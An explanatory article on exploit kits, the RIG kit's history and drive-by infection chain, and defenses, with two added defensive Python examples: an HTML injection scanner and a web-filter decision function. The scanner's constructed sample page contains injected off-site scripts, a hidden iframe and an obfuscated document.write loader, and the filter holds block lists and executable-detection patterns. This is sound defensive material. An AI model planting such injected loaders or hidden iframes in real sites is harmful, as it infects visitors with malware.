Exploit kits are no longer as popular as they once were, but they are still being used as a vehicle for distributing malware. An exploit kit is a toolkit hosted on an attacker-controlled website that fingerprints visitors' browsers and plug-ins for exploitable versions and uses matching exploits to silently deliver malicious payloads. Exploit kits were first detected in 2006 and were once one of the most common ways that malware was distributed, typically exploiting vulnerabilities in browsers and browser plug-ins such as Adobe Flash, Microsoft Silverlight, Java, and ActiveX to deliver information stealers, remote access Trojans, and ransomware.
Since 2017, exploit kits have been in decline, in large part because Adobe Flash, whose vulnerabilities were among the most heavily exploited, was deprecated and then reached end-of-life. Today, exploit kits are still used for distributing malware, most commonly crypto-mining malware, although under the exploit-kit-as-a-service model they are used to deliver a variety of payloads.
Some of the most successful current exploit kits are fileless: they write nothing to disk and instead load malicious code directly into memory, which leaves little for file-based antivirus scanning to catch. Traffic to these exploit kits is most commonly generated through malvertising, malicious adverts displayed on legitimate websites, either via the third-party ad networks that website owners embed to increase revenue or through compromised websites.
In recent years, the RIG exploit kit has been one of the most successful. RIG first appeared in 2014 and was active until 2017, when a coordinated operation led by RSA Research took down its infrastructure. According to the researchers involved in that takedown, the operators of RIG had compromised hundreds of hosting accounts, mostly at GoDaddy, and hid their malicious code in hidden subdomains of the legitimate sites (shadow domains) to avoid detection; the kit was served from tens of thousands of active shadow domains. The operators are thought to have gained access to those hosting accounts through phishing attacks that stole credentials and through brute-force attacks on accounts with weak passwords.
The infection chain starts with a compromised (or attacker-controlled) site into which code has been injected that loads JavaScript from a domain the attacker controls. When a visitor lands on the site, the kit's gate checks whether the visitor is worth targeting, for example by geographic region and by browser and plug-in versions, before the exploit is served; the same check keeps the exploit away from security researchers and sandboxes. If the exploit succeeds, its shellcode fetches and runs the required payload, writing it to disk or, in fileless kits, loading it straight into memory. Exploit kits are offered to cybercriminal groups under the exploit-kit-as-a-service model, where they either rent access or pay to have their payloads delivered. The attack is fully automated: aside from visiting a page that pulls in the kit, no user interaction is required to deliver malware.
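The first link in that chain, the injection on the compromised site, is something a site owner or responder can check for. The following scanner is an added example written for this article, not code from the article itself or from any exploit-kit research; it uses only the Python standard library, a constructed sample page, and an assumed allowlist of first-party script hosts and assumed obfuscation heuristics that you would adapt to your own site. It flags scripts and iframes loaded from off-site hosts, iframes sized or styled to be invisible, and inline scripts that use the usual loader tricks.

```python
"""Scan an HTML page for the injection patterns described above.

Added example, not code from the original article. It uses only the
standard library and a constructed sample page; the first-party host
allowlist and the obfuscation heuristics are assumptions to adapt.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: hosts the site legitimately loads scripts from (first-party CDN etc.).
ALLOWED_SCRIPT_HOSTS = {"cdn.example-shop.com"}

# Assumed heuristics: calls that injected loaders commonly use to hide the
# second-stage <script> or <iframe> from a casual look at the page source.
OBFUSCATION_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _offsite(src, page_host):
    """Hostname of src if it points off-site and is not allowlisted, else None."""
    host = urlparse(src).hostname  # None for relative URLs
    if host and host != page_host and host not in ALLOWED_SCRIPT_HOSTS:
        return host
    return None


class InjectionScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []        # list of (kind, detail) tuples
        self._script_buf = None   # collects the text of the current inline <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script_buf = []
            if a.get("src") and _offsite(a["src"], self.page_host):
                self.findings.append(("external_script", a["src"]))
        elif tag == "iframe":
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or HIDDEN_STYLE_RE.search(a.get("style", "")))
            if hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
            elif a.get("src") and _offsite(a["src"], self.page_host):
                self.findings.append(("external_iframe", a["src"]))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            m = OBFUSCATION_RE.search(body)
            if m:
                self.findings.append(("obfuscated_inline_script", m.group(0)))
            self._script_buf = None


def scan_page(html, page_host):
    """Return the list of (kind, detail) findings for one page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a shop page with three injected elements after the <h1>.
SAMPLE_PAGE = r"""<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-shop.com/jquery.min.js"></script>
</head><body>
<h1>Welcome to the shop</h1>
<script src="//x7k2.hosting-victim.example/loader.js"></script>
<iframe src="http://203.0.113.10/gate.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//203.0.113.10/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "www.example-shop.com"):
        print(f"{kind}: {detail}")
```

Run it against a copy of each page fetched as a normal browser would (the kit's gate may serve clean content to anything that does not look like a target), and treat every off-site script host that is not in your allowlist as something to explain, not just the ones that look suspicious.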
The RIG exploit kit was rebuilt after the takedown and resurfaced in 2021, was temporarily shut down, and returned in 2022 with a new exploit arsenal. According to researchers at the cybersecurity firm PRODAFT, RIG has never been more successful, achieving a successful exploitation rate of 30% in 2022. The kit is updated weekly or monthly with new exploits and has been used to deliver a range of payloads, including banking Trojans such as Dridex and IcedID, information stealers such as Raccoon Stealer and AZORult, malware downloaders such as WastedLoader, and ransomware such as Royal. Its most successful recent exploit targets CVE-2021-26411, a memory corruption vulnerability in Internet Explorer. RIG remains highly active, with the researchers reporting a 22% successful exploitation rate over the past two months.
Exploit kits exploit vulnerabilities in browsers and browser plug-ins, so the first line of defense is to keep browsers and plug-ins patched and to retire components that no longer receive fixes, such as Adobe Flash and Internet Explorer. That only works for software IT knows about: employees often install browsers and plug-ins without the IT department's knowledge, and those copies may never be updated, so a software inventory is part of the defense. As an additional layer, businesses should consider a web filter, which can block the adverts that drive traffic to exploit-kit landing pages, block access to known malicious hosts through filtering controls, and block the payload downloads that follow a successful exploit.
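Two details matter when writing the filtering rules the paragraph above recommends, and the following added example shows both. It is illustrative code written for this article, not the article's own or any vendor's product code, and its block and allow lists, request records and payload bytes are all constructed. First, a shadow domain planted on a compromised hosting account must be blockable as an exact host without blocking the legitimate parent site, while an ad network should be blocked with all of its subdomains. Second, the payload download should be judged by content type and the first bytes of the response rather than by the URL, because kits serve executables under harmless-looking names.

```python
"""Web-filter decision logic for the drive-by chain described in the article.

Added example, not the article's or any product's code. The block and allow
lists, the request records and the payload bytes are constructed; a real
filter would load the lists from threat feeds and inspect the live response.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed list entries. A leading dot matches the host and every subdomain (right
# for an ad network); a bare entry matches only that exact name, so a shadow
# subdomain on a compromised account is blocked without taking the parent site
# offline.
BLOCKED_HOSTS = {
    ".example-adnetwork.com",        # malvertising source, all subdomains
    "x7k2.hosting-victim.example",   # shadow subdomain on a compromised account
    "203.0.113.10",                  # exploit-kit landing host
}
# Assumed: hosts from which executable downloads are acceptable.
EXEC_ALLOWED_HOSTS = {".example-vendor.com"}

EXEC_CONTENT_TYPES = {
    "application/x-msdownload",
    "application/x-dosexec",
    "application/vnd.microsoft.portable-executable",
}
EXEC_MAGIC = (b"MZ", b"\x7fELF")   # PE and ELF file headers


@dataclass
class Request:
    url: str
    content_type: str = ""
    body_prefix: bytes = b""   # first bytes of the response as the filter sees them


def host_matches(host, entries):
    """Exact match for bare entries, host-or-subdomain match for dotted entries."""
    for entry in entries:
        if entry.startswith("."):
            if host == entry[1:] or host.endswith(entry):
                return True
        elif host == entry:
            return True
    return False


def looks_executable(req):
    """Decide on content, not on the URL: kits serve payloads under harmless names."""
    declared = req.content_type.split(";")[0].strip().lower()
    return declared in EXEC_CONTENT_TYPES or req.body_prefix.startswith(EXEC_MAGIC)


def filter_decision(req):
    """Return "allow" or a "block:<reason>" string for one request/response pair."""
    host = (urlparse(req.url).hostname or "").lower()
    if host_matches(host, BLOCKED_HOSTS):
        return "block:listed_host"
    if looks_executable(req) and not host_matches(host, EXEC_ALLOWED_HOSTS):
        return "block:executable_from_unapproved_host"
    return "allow"


if __name__ == "__main__":
    # Constructed requests: the chain from the article, plus legitimate traffic.
    for req in (
        Request("https://cdn.example-adnetwork.com/ad.js"),
        Request("https://x7k2.hosting-victim.example/loader.js"),
        Request("https://www.hosting-victim.example/"),
        Request("https://198.51.100.7/photo.jpg", "image/jpeg", b"MZ\x90\x00"),
        Request("https://update.example-vendor.com/setup.exe", "application/x-msdownload", b"MZ"),
    ):
        print(f"{filter_decision(req):40} {req.url}")
```

The `photo.jpg` case is the one worth remembering: an image content type with a PE header is exactly what a drive-by payload fetch looks like, and an extension-based rule would wave it through.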